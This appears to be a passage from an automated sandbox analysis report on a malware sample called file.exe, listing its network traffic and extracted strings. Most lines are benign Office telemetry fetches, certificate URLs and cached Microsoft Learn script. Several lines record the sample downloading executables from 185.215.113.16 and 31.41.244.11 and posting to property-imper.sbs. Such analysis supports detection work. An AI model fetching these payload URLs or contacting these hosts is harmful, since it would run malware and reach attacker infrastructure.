              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: file.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215
              Source: file.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000002.2491785377.00000000007CB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
              Source: file.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
              Source: file.exe, 00000000.00000003.2390528382.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2492068192.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://31.41.244.11/files/rnd.exe
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2295891028.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_118.5.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2154466811.000000000549E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_118.5.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_118.5.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_118.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_118.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
